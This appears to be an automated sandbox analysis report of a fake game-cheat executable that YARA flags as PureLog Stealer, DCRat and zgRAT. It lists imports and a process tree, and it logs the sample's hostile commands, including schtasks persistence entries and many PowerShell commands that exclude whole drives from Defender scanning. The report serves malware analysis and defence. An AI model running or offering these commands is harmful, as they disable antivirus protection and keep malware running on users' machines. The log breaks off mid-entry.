                                                  RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
                                                  RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
                                                  RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
                                                  RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
                                                  RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
                                                  RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
                                                  RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
                                                  RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
                                                  RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
                                                  RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                                                  DLL | Import
                                                  KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                  OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
                                                  gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                  Language of compilation system | Country where language is spoken | Map
                                                  English | United States |
                                                  No network behavior found

                                                  Target ID:0
                                                  Start time:07:31:15
                                                  Start date:13/01/2025
                                                  Path:C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe"
                                                  Imagebase:0xcf0000
                                                  File size:2'324'826 bytes
                                                  MD5 hash:BE4AE5E0B545E43608AE6A60CE297871
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1259094953.0000000006ACE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1259921924.00000000073D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:07:31:16
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\msportComWin\xtUjCOEXV8hvxooNRYyHQv7v29HXxWwl.vbe"
                                                  Imagebase:0x1c0000
                                                  File size:147'456 bytes
                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:07:31:18
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\msportComWin\5Jq5kgQebZBPc8KIFjklSaK6KtfwfF1rpT92XeRglY4x6Z5YYulxiLU9VV.bat" "
                                                  Imagebase:0x410000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:07:31:18
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:07:31:18
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\msportComWin/BridgePortsurrogateserverref.exe"
                                                  Imagebase:0xf10000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000000.1285212677.0000000000F12000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 83%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"
                                                  Imagebase:0x7ff7842e0000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP"
                                                  Imagebase:0x7ff7b0980000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\jnowHpJlZlXal.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\msportComWin\jnowHpJlZlXal.exe
                                                  Imagebase:0xe50000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 83%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:07:31:27
                                                  Start date:13/01/2025
                                                  Path:C:\msportComWin\jnowHpJlZlXal.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\msportComWin\jnowHpJlZlXal.exe
                                                  Imagebase:0xc20000
                                                  File size:2'002'944 bytes
                                                  MD5 hash:5F80A11E82CC7495CF5AD7DF3D052721
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:07:31:28
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"
                                                  Imagebase:0x7ff7842e0000
                                                  File size:2'759'232 bytes
                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:07:31:28
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:07:31:28
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6615.tmp" "c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP"
                                                  Imagebase:0x7ff7b0980000
                                                  File size:52'744 bytes
                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "jnowHpJlZlXalj" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'" /rl HIGHEST /f
                                                  Imagebase:0x7ff658d30000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:35
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\schtasks.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:schtasks.exe /create /tn "BridgePortsurrogateserverrefB" /sc MINUTE /mo 13 /tr "'C:\msportComWin\BridgePortsurrogateserverref.exe'" /f
                                                  Imagebase:0x7ff658d30000
                                                  File size:235'008 bytes
                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:38
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:40
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:41
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:43
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:45
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/msportComWin/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:47
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:48
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:49
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:50
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:51
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:52
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:53
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:54
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:55
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:56
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:57
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:58
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:59
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:60
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:61
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:62
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:63
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\msportComWin\jnowHpJlZlXal.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:64
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  Target ID:65
                                                  Start time:07:31:29
                                                  Start date:13/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe'
                                                  Imagebase:0x7ff741d30000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:66
